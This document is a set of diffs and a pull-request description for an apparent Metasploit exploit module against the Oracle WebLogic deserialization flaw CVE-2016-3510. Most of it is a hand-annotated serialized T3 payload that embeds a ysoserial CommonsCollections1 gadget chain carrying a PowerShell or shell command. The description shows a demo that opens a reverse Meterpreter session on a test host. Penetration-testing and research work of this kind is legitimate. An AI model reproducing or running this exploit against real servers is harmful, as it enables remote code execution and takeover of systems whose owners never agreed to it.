+    data << '71007e0003'                                   #        (Handle) 0x007e0003
+    data << '78707702000078'                               #   block footers
+
+    data << 'fe010000'                                     # ----- separator -----
+
+    data << 'aced0005'                                     # JSO v5 header
+    data << '7372'                                         # object header
+    data << '001d7765626c6f6769632e726a766d2e436c6173'     # className (29 bytes): weblogic.rjvm.ClassTableEntry
+    data << '735461626c65456e747279'                       #    (continued)
+    data << '2f52658157f4f9ed'                             # serialVersionUID
+    data << '0c'                                           # EXTERNALIZABLE | BLOCKDATA
+    data << '00007870'                                     # remainder of object header
+    data << '72'                                           # object header
+    data << '00247765626c6f6769632e636f6d6d6f6e2e696'      # className (36 bytes): weblogic.common.internal.VersionInfo
+    data << 'e7465726e616c2e56657273696f6e496e666f'        #    (continued)
+    data << '972245516452463e'                             # serialVersionUID
+    data << '02'                                           # SC_SERIALIZABLE
+    data << '0003'                                         #   fieldCount = 3
+    data << '5b0008'                                       #   array header (8 bytes)
+    data << '7061636b61676573'                             #     ARRAY NAME = 'packages'
+    data << '740027'                                       #     TC_STRING className1 (39 bytes)
+    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'       #       weblogic/common/internal/PackageInfo
+    data << '6e7465726e616c2f5061636b616765496e666f'       #       (continued)
+    data << '3b'                                           #       (continued)
+    data << '4c000e'                                       #   object header (14 bytes)
+    data << '72656c6561736556657273696f6e'                 #     releaseVersion
+    data << '740012'                                       #     TC_STRING (18 bytes)
+    data << '4c6a6176612f6c616e672f537472696e673b'         #       versionInfoAsBytes
+    data << '5b0012'                                       #   array header (18 bytes)
+    data << '76657273696f6e496e666f41734279746573'         #     ARRAY NAME = java/lang/String;
+    data << '740002'                                       #     TC_STRING (2 bytes)
+    data << '5b42'                                         #       0x5b42 = [B
+    data << '78'                                           # block footer
+
+    data << '720024'                                       # class (36 bytes)
+    data << '7765626c6f6769632e636f6d6d6f6e2e696e'         #   weblogic.common.internal.PackageInfo
+    data << '7465726e616c2e5061636b616765496e666f'         #   (continued)
+    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID
+
+    data << '02'                                           #   SC_SERIALIZABLE
+    data << '0008'                                         #   fieldCount = 8
+    data << '4900056d616a6f72'                             #   0: Int: major
+    data << '4900056d696e6f72'                             #   1: Int: minor
+    data << '49000c726f6c6c696e675061746368'               #   2: Int rollingPatch
+    data << '49000b736572766963655061636b'                 #   3: Int: servicePack
+    data << '5a000e74656d706f726172795061746368'           #   4: Bool: temporaryPatch
+    data << '4c0009696d706c5469746c65'                     #   5: Obj: implTitle
+    data << '71'                                           #      TC_REFERENCE
+    data << '007e0004'                                     #      Handle = 0x007e0004
+    data << '4c000a696d706c56656e646f72'                   #   6: Obj: implVendor
+    data << '71'                                           #      TC_REFERENCE
+    data << '007e0004'                                     #      Handle = 0x007e0004
+    data << '4c000b696d706c56657273696f6e'                 #   7: Obj: implVersion
+    data << '71'                                           #      TC_REFERENCE
+    data << '007e0004'                                     #      Handle = 0x007e0004
+    data << '78'                                           # class footer
+    data << '70'                                           # TC_NULL
+    data << '77020000'                                     # BLOCKDATA (2 bytes): 0x0000
+    data << '78'                                           # block footer
+
+    data << 'fe010000'                                     # ----- separator -----
+
+    data << 'aced0005'                                     # JSO v5 header
+    data << '73'                                           # object header
+    data << '72001d'                                       # className (29 bytes):
+    data << '7765626c6f6769632e726a766d2e436c617373'       #   weblogic.rjvm.ClassTableEntry
+    data << '5461626c65456e747279'                         #   (continued)
+    data << '2f52658157f4f9ed'                             #   serialVersionUID
+    data << '0c00007870'                                   #   remainder of object header
+    data << '720021'                                       # className (33 bytes)
+    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'       #   weblogic.common.internal.PeerInfo
+    data << '65726e616c2e50656572496e666f'                 #   (continued)
+    data << '585474f39bc908f1'                             #   serialVersionUID
+    data << '02'                                           #   SC_SERIALIZABLE
+    data << '0006'                                         #   fieldCount = 6
+    data << '4900056d616a6f72'                             #     0: Int: major
+    data << '4900056d696e6f72'                             #     1: Int: minor
+    data << '49000c726f6c6c696e675061746368'               #     2: Int rollingPatch
+    data << '49000b736572766963655061636b'                 #     3: Int: servicePack
+    data << '5a000e74656d706f726172795061746368'           #     4: Bool: temporaryPatch
+    data << '5b00087061636b61676573'                       #     5: Array: packages
+    data << '740027'                                       #        TC_STRING (39 bytes)
+    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'       #        Lweblogic/common/internal/PackageInfo;
+    data << '6e7465726e616c2f5061636b616765496e666f'       #        (continued)
+    data << '3b'                                           #        (continued)
+    data << '78'                                           # block footer
+    data << '720024'                                       # class (36 bytes)
+    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'       #   Lweblogic/common/internal/PackageInfo;
+    data << '65726e616c2e56657273696f6e496e666f'           #   (continued)
+    data << '972245516452463e'                             #   serialVersionUID
+    data << '02'                                           #   SC_SERIALIZABLE
+    data << '0003'                                         #   fieldCount = 3
+    data << '5b0008'                                       #   0: Array
+    data << '7061636b6167657371'                           #      packages
+    data << '007e0003'                                     #      Handle = 0x00730003
+    data << '4c000e72656c6561736556657273696f6e'           #   1: Obj: releaseVersion
+    data << '7400124c6a6176612f6c616e672f537472696e673b'   #      Ljava/lang/String;
+    data << '5b001276657273696f6e496e666f41734279746573'   #   2: Array: versionInfoAsBytes
+    data << '740002'                                       #      TC_STRING (2 bytes)
+    data << '5b42'                                         #      VALUE = 0x5b42 = [B
+    data << '78'                                           # block footer
+    data << '720024'                                       # class: (36 bytes)
+    data << '7765626c6f6769632e636f6d6d6f6e2e696e746572'   #   Name = weblogic.common.internal.PackageInfo
+    data << '6e616c2e5061636b616765496e666f'               #   (continued)
+    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID
+    data << '02'                                           #   SC_SERIALIZABLE
+    data << '0008'                                         #   fieldCount = 8
+    data << '4900056d616a6f72'                             #   0: Int: major
+    data << '4900056d696e6f72'                             #   1: Int: minor
+    data << '49000c726f6c6c696e675061746368'               #   2: Int rollingPatch
+    data << '49000b736572766963655061636b'                 #   3: Int: servicePack
+    data << '5a000e74656d706f726172795061746368'           #   4: Bool: temporaryPatch
+    data << '4c0009696d706c5469746c65'                     #   5: Obj: implTitle
+    data << '71'                                           #      TC_REFERENCE
+    data << '007e0005'                                     #      Handle = 0x007e0005
+    data << '4c000a696d706c56656e646f72'                   #   6: Obj: implVendor
+    data << '71'                                           #      TC_REFERENCE
+    data << '007e0005'                                     #      Handle = 0x007e0005
+    data << '4c000b696d706c56657273696f6e'                 #   7: Obj: implVersion
+    data << '71'                                           #      TC_REFERENCE
+    data << '007e0005'                                     #      Handle = 0x007e0005
+    data << '78'                                           # class footer
+    data << '707702000078'                                 # block footers
+
+    data << 'fe00ff'                                       # this cruft again.  some kind of footer
+
+    data << 'fe010000'                                     # ----- separator -----
+
+    # weblogic.rjvm.JVMID object
+    data << 'aced0005'                                     # JSO v5 header
+    data << '73'                                           # object header
+    data << '720013'                                       #   class (19 bytes)
+    data << '7765626c6f6769632e726a766d2e4a564d4944'       #   name = 'weblogic.rjvm.JVMID'
+    data << 'dc49c23ede121e2a'                             #   serialVersionUID
+    data << '0c'                                           #   EXTERNALIZABLE | BLOCKDATA
+    data << '0000'                                         #   fieldCount = 0   (!!!)
+    data << '78'                                           # block footer
+    data << '70'                                           # NULL
+    data << '7750'                                         # block header (80 bytes)
+    data << '21'                                           #   !
+    data << '000000000000000000'                           #   9 NULL BYTES
+    data << '0d'                                           #   \n
+    data << '3139322e3136382e312e323237'                         #   192.168.1.227
+    data << '00'                                           #   \0
+    data << '12'                                           #      #TODO: UNKNOWN
+    data << '57494e2d4147444d56515542315436'               #   WIN-AGDMVQUB1T6
+    data << '2e'                                           #      #TODO: UNKNOWN
+    data << '656883348cd6000000070000'                     #      #TODO: UNKNOWN
+    data << rport.to_s(16).rjust(4, '0')                   #   callback port
+    data << 'ffffffffffffffffffffffffffffffffffffff'       #      #TODO: UNKNOWN
+    data << 'ffffffffff'                                   #      #TODO: UNKNOWN
+    data << '78'                                           # block footer
+
+    data << 'fe010000'                                     # ----- separator -----
+
+    # weblogic.rjvm.JVMID object
+    data << 'aced0005'                                     # JSO v5 header
+    data << '73'                                           # object header
+    data << '72'                                           #   class
+    data << '00137765626c6f6769632e726a766d2e4a564d4944'   #   Name: weblogic.rjvm.JVMID
+    data << 'dc49c23ede121e2a'                             #   serialVersionUID
+    data << '0c'                                           #   EXTERNALIZABLE | BLOCKDATA
+    data << '0000'                                         #   fieldCount = 0
+    data << '78'                                           # end block
+    data << '70'                                           # TC_NULL
+    data << '77'                                           # block header
+    data << '20'                                           #   length = 32 bytes
+    data << '0114dc42bd071a772700'                         #      #TODO: UNKNOWN
+    data << '0d'                                           #      \n
+    data << '3234322e3231342e312e323534'                   #      242.214.1.254
+    data << '61863d1d'                                     #      #TODO: UNKNOWN
+    data << '00000000'                                     #      NULL BYTES
+    data << '78'                                           # block footer
 
     sock.put([data].pack('H*'))
     sleep(1)
@@ -179,99 +337,159 @@ class MetasploitModule < Msf::Exploit::Remote
     # payload creation
     if target.name == 'Windows'
       pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
-      mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
     elsif target.name == 'Unix' || target.name == 'Solaris'
       nix_cmd = payload.encoded
-      mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
     end
 
-    # serializing manually the payload string
-    serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
-    serialized_cmd << mycmd
-
     # basic weblogic ClassTableEntry object (serialized)
+    # TODO: WHAT DOES THIS DO?  CAN WE RANDOMIZE ANY OF IT?
     payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
     payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
-    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
-    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
-    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
-    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
-    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
-    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
-    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
-    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
-    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
-    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
-    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
-    payload << '78707702000078fe010000'
+    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'
+
+    payload << 'fe010000'                                  # ----- separator -----
+
+    payload << 'aced0005'                                  # JSO v5 header
+    payload << '73'                                        # object header
+    payload << '72'                                        #   class
+    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry
+    payload << '73735461626c65456e747279'                  #   (cont)
+    payload << '2f52658157f4f9ed'                          #   serialVersionUID
+    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA
+    payload << '0000'                                      #   fieldCount = 0
+    payload << '7870'                                      #   remaining object header
+    payload << '72'                                        # class header
+    payload << '00025b42'                                  #   Name: 0x5b42
+    payload << 'acf317f8060854e0'                          #   serialVersionUID
+    payload << '02'                                        #   SERIALIZABLE
+    payload << '0000'                                      #   fieldCount = 0
+    payload << '7870'                                      #   class footer
+    payload << '77'                                        # block header
+    payload << '020000'                                    #   contents = 0x0000
+    payload << '78'                                        #   block footer
+
+    payload << 'fe010000'                                  # ----- separator -----
+
+    payload << 'aced0005'                                  # JSO v5 header
+    payload << '73'                                        # object header
+    payload << '72'                                        #   class
+    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry
+    payload << '73735461626c65456e747279'                  #   (cont)
+    payload << '2f52658157f4f9ed'                          #   serialVersionUID
+    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA
+    payload << '0000'                                      #   fieldCount = 0
+    payload << '7870'                                      #   remaining object header
+    payload << '72'                                        # class header
+
+    payload << '00135b4c6a6176612e6c616e672e4f626a'        #   Name: [Ljava.lang.Object;
+    payload << '6563743b'                                  #   (cont)
+    payload << '90ce589f1073296c'                          #   serialVersionUID
+    payload << '02'                                        #   SERIALIZABLE
+    payload << '0000'                                      #   fieldCount = 0
+    payload << '7870'                                      #   remaining object header
+    payload << '77'                                        # block header
+    payload << '020000'                                    #   contents = 0x0000
+    payload << '78'                                        #   block footer
+
+    payload << 'fe010000'                                  # ----- separator -----
+
+    payload << 'aced0005'                                  # JSO v5 header
+    payload << '73'                                        # object header
+    payload << '72'                                        #   class
+
+    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry
+    payload << '73735461626c65456e747279'                  #   (cont)
+    payload << '2f52658157f4f9ed'                          #   serialVersionUID
+    payload << '0c'                                        #   SERIALIZABLE | BLOCKDATA
+    payload << '0000'                                      #   fieldCount = 0
+    payload << '7870'                                      #   block footer
+    payload << '72'                                        # class header
+    payload << '00106a6176612e7574696c2e566563746f72'      #   Name: java.util.Vector
+    payload << 'd9977d5b803baf01'                          #   serialVersionUID
+    payload << '03'                                        #   WRITE_METHOD | SERIALIZABLE
+    payload << '0003'                                      #   fieldCount = 3
+    payload << '4900116361706163697479496e6372656d656e74'  #   0: Int: capacityIncrement
+    payload << '49000c656c656d656e74436f756e74'            #   1: Int: elementCount
+    payload << '5b000b656c656d656e7444617461'              #   2: Array: elementData
+    payload << '7400135b4c6a6176612f6c616e672f4f626a6563'  #   3: String: [Ljava/lang/Object;
+    payload << '743b'                                      #      (cont)
+    payload << '7870'                                      #   remaining object header
+    payload << '77'                                        # block header
+    payload << '020000'                                    #   contents = 0x0000
+    payload << '78'                                        #   block footer
+
+    payload << 'fe010000'                                  # ----- separator -----
 
     # payload generated from ysoserial and wrapped in a MarshalledObject:
+    payload << 'aced0005'                                  # JSO v5 header
+    payload << '73'                                        # object header
+    payload << '72'                                        #   class header
+
+    payload << '00257765626c6f6769632e636f7262612e757469'  #     Name = weblogic.corba.utils.MarshalledObject
+    payload << '6c732e4d61727368616c6c65644f626a656374'    #       (cont)
+    payload << '592161d5f3d1dbb6'                          #     serialVersionUID
+    payload << '02'                                        #     SERIALIZABLE
+    payload << '0002'                                      #     fieldCount = 2
+    payload << '49000468617368'                            #     0: Int: hash
+    payload << '5b00086f626a4279746573'                    #     1: Array: objBytes
+    payload << '7400025b42'                                #        Value: 0x5b42
+    payload << '7870'                                      #     class footer
+                                                           #   class Data:
+    payload << '21210fdc'                                  #     hash = 0x21210fdc (555814876d)
+    payload << '757200025b42'                              #     objBytes = [ 0x5b42 ]
+    payload << 'acf317f8060854e0'                          #     serialVersionUID
+    payload << '02'                                        #     SERIALIZABLE
+    payload << '0000'                                      #     fieldCount = 0
+    payload << '7870'                                      #   class footer
+    payload << '0000'                                      #   arraySize (first two bytes)
+    payload << ((pwrshl.length >> 1) + 1137 + 1392).to_s(16).rjust(4,'0')   # arraySize (lower two bytes)
+                                                                            # 1392 is there because of the 0x0600 constant below
+                                                                            # 1137 is there... because... I don't know why.  But it works!
+
     # java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe
-    # the command (calc.exe) is patched in runtime with the payload
-    payload << 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d6172'
-    payload << '7368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b'
-    payload << '00086f626a42797465737400025b42787021210fdc757200025b42acf317f806'
-    payload << '0854e002000078700000'
-    # adjust the length of payload
-    payload << ((mycmd.length >> 1) + 1392).to_s(16).rjust(4,'0')
-    payload << 'aced00057372003273756e2e7265666c6563742e'
-    payload << '616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48'
-    payload << '616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c756573'
-    payload << '74000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176'
-    payload << '612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c'
-    payload << '2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e1'
-    payload << '27da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c'
-    payload << '6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372'
-    payload << '002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73'
-    payload << '2e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f72'
-    payload << '7974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c65637469'
-    payload << '6f6e732f5472616e73666f726d65723b78707372003a6f72672e617061636865'
-    payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e4368'
-    payload << '61696e65645472616e73666f726d657230c797ec287a97040200015b000d6954'
-    payload << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f'
-    payload << '6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7870757200'
-    payload << '2d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e'
-    payload << '732e5472616e73666f726d65723bbd562af1d834189902000078700000000573'
-    payload << '72003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e'
-    payload << '732e66756e63746f72732e436f6e7374616e745472616e73666f726d65725876'
-    payload << '90114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c61'
-    payload << '6e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d'
-    payload << '65000000000000000000000078707372003a6f72672e6170616368652e636f6d'
-    payload << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65'
-    payload << '725472616e73666f726d657287e8ff6b7b7cce380200035b0005694172677374'
-    payload << '00135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e'
-    payload << '616d657400124c6a6176612f6c616e672f537472696e673b5b000b6950617261'
-    payload << '6d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200'
-    payload << '135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078'
-    payload << '700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e'
-    payload << '672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d'
-    payload << '6574686f647571007e001e00000002767200106a6176612e6c616e672e537472'
-    payload << '696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e'
-    payload << '001b00000002707571007e001b00000000740006696e766f6b657571007e001e'
-    payload << '00000002767200106a6176612e6c616e672e4f626a6563740000000000000000'
-    payload << '00000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e67'
-    payload << '2e537472696e673badd256e7e91d7b4702000078700000000174'
-
-    payload << serialized_cmd
-
-    payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
-    payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
-    payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
-    payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
-    payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
-    payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
-    payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
-    # end of payload object
+    ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload("CommonsCollections1",pwrshl)
+    payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
 
     # basic weblogic ImmutableServiceContext object (serialized)
-    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
-    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
-    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
-    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
-    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
-    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
-    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
-    payload << '6f3b290000001b7878fe00ff'
+    payload << 'fe010000'                                  # ----- separator -----
+
+    payload << 'aced0005'                                  # JSO v5 header
+    payload << '73'                                        # object header
+    payload << '72'                                        #   class
+    payload << '00257765626c6f6769632e726a766d2e496d6d75'  #   Name = weblogic.rjvm.ImmutableServiceContext
+    payload << '7461626c6553657276696365436f6e74657874'    #     (cont)
+    payload << 'ddcba8706386f0ba'                          #   serialVersionUID
+    payload << '0c'                                        #   SERIALIZABLE | BLOCKDATA
+    payload << '0000'                                      #   fieldCount = 0
+    payload << '78'                                        #   remainder of object header
+    payload << '72'                                        # class header
+    payload << '00297765626c6f6769632e726d692e70726f7669'  #   Name: weblogic.rmi.provider.BasicServiceContext
+    payload << '6465722e426173696353657276696365436f6e74'  #     (cont)
+    payload << '657874'                                    #     (cont)
+    payload << 'e4632236c5d4a71e'                          #    serialVersionUID
+    payload << '0c'                                        #    SERIALIZABLE | BLOCKDATA
+    payload << '0000'                                      #    fieldCount = 0
+    payload << '78'                                        #    block footer
+    payload << '70'                                        #    TC_NULL
+    payload << '77'                                        #  block header
+    payload << '020600'                                    #    Contents: 0x0600 (1536d) ### LENGTH OFFSET ADDED BELOW  #TODO: WHY?
+    payload << '73'                                        #    object header
+    payload << '72'                                        #      class description
+    payload << '00267765626c6f6769632e726d692e696e746572'  #        Name = weblogic.rmi.internal.MethodDescriptor
+    payload << '6e616c2e4d6574686f6444657363726970746f72'  #          (cont)
+    payload << '12485a828af7f67b'                          #        serialVersionUID
+    payload << '0c'                                        #    EXTERNALIZABLE | BLOCKDATA
+    payload << '0000'                                      #    fieldCount = 0
+    payload << '78'                                        #    block footer
+    payload << '70'                                        #    TC_NULL
+    payload << '77'                                        #  block header
+    payload << '34002e61757468656e746963617465284c776562'  #   HEX-ASCII: authenticate(Lweblogic.security.acl.UserInfo;)
+    payload << '6c6f6769632e73656375726974792e61636c2e55'  #     (cont)
+    payload << '736572496e666f3b290000001b'                #     (cont)
+    payload << '78'                                        #   block footer
+    payload << '78'                                        # object footer
+
+    payload << 'fe00ff'                                    # this cruft again.  some kind of footer
 
     # sets the length of the stream
     data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
@@ -280,7 +498,6 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put([data].pack('H*'))
     sleep(1)
     sock.get_once
-
   end
 
   def exploit

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -65,12 +65,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
       'DefaultTarget' => 0,
-      'DefaultOptions' =>
-        {
-          'RPORT' => 7001,
-          'WfsDelay' => 12
-        },
+      'DefaultOptions' => { 'WfsDelay' => 12 },
       'DisclosureDate' => 'Jul 19 2016'))
+
+    register_options([Opt::RPORT(7001)])
   end
 
   def check
@@ -108,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def t3_handshake
+    # retrieved from network traffic
     shake = '74332031322e322e310a41533a323535'
     shake << '0a484c3a31390a4d533a313030303030'
     shake << '30300a0a'
@@ -119,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def build_t3_request_object
     # T3 request serialized data
+    # retrieved by watching network traffic
     data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
     data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
     data << '700000000a000000030000000000000006007070707070700000000a00000003'
@@ -180,18 +180,16 @@ class MetasploitModule < Msf::Exploit::Remote
     if target.name == 'Windows'
       pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
       mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
-    elsif target.name == 'Unix'
+    elsif target.name == 'Unix' || target.name == 'Solaris'
       nix_cmd = payload.encoded
-      nix_cmd.prepend('/bin/sh -c ')
       mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
-    elsif target.name == 'Solaris'
-      sol_cmd = payload.encoded
-      mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
     end
 
+    # serializing manually the payload string
     serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
     serialized_cmd << mycmd
 
+    # basic weblogic ClassTableEntry object (serialized)
     payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
     payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
     payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
@@ -207,11 +205,14 @@ class MetasploitModule < Msf::Exploit::Remote
     payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
     payload << '78707702000078fe010000'
 
-    # marshalledobject
+    # payload generated from ysoserial and wrapped in a MarshalledObject:
+    # java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe
+    # the command (calc.exe) is patched in runtime with the payload
     payload << 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d6172'
     payload << '7368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b'
     payload << '00086f626a42797465737400025b42787021210fdc757200025b42acf317f806'
     payload << '0854e002000078700000'
+    # adjust the length of payload
     payload << ((mycmd.length >> 1) + 1392).to_s(16).rjust(4,'0')
     payload << 'aced00057372003273756e2e7265666c6563742e'
     payload << '616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48'
@@ -251,7 +252,6 @@ class MetasploitModule < Msf::Exploit::Remote
     payload << '00000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e67'
     payload << '2e537472696e673badd256e7e91d7b4702000078700000000174'
 
-
     payload << serialized_cmd
 
     payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
@@ -261,9 +261,9 @@ class MetasploitModule < Msf::Exploit::Remote
     payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
     payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
     payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
+    # end of payload object
 
-    # serialized end
-
+    # basic weblogic ImmutableServiceContext object (serialized)
     payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
     payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
     payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
@@ -273,6 +273,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
     payload << '6f3b290000001b7878fe00ff'
 
+    # sets the length of the stream
     data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
     data << payload
 

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -179,11 +179,11 @@ class MetasploitModule < Msf::Exploit::Remote
     if target.name == 'Windows'
       pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
       mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
-    else if target.name == 'Unix'
+    elseif target.name == 'Unix'
       nix_cmd = payload.encoded
       nix_cmd.prepend('/bin/sh -c ')
       mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
-    else if target.name == 'Solaris'
+    elseif target.name == 'Solaris'
       sol_cmd = payload.encoded
       mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
     end

--- a/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
@@ -297,4 +297,3 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
   end
 end
-


### PR DESCRIPTION
Hi everyone,
Please, add this exploit module for CVE-2016-3510, Oracle Weblogic Deserialization Vulnerability, 
It was tested on Windows 7 x64 with Oracle Weblogic Server v10.3.6.0 and v12.1.3.0

## TODO
Test on Linux
Test on Solaris
Improve the documentation

## DEMO
```
 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
 rhost => 192.168.192.6
 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit

 [*] Started reverse TCP handler on 192.168.192.136:4444 
 [*] 192.168.192.6:7001 - Sending handshake...
 [*] 192.168.192.6:7001 - Sending T3 request object...
 [*] 192.168.192.6:7001 - Sending client object payload...
 [*] Sending stage (179779 bytes) to 192.168.192.6
 [*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
```

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
- [x] set rhost
- [x] set rport
- [x] exploit
- [ ] Enjoy!!!

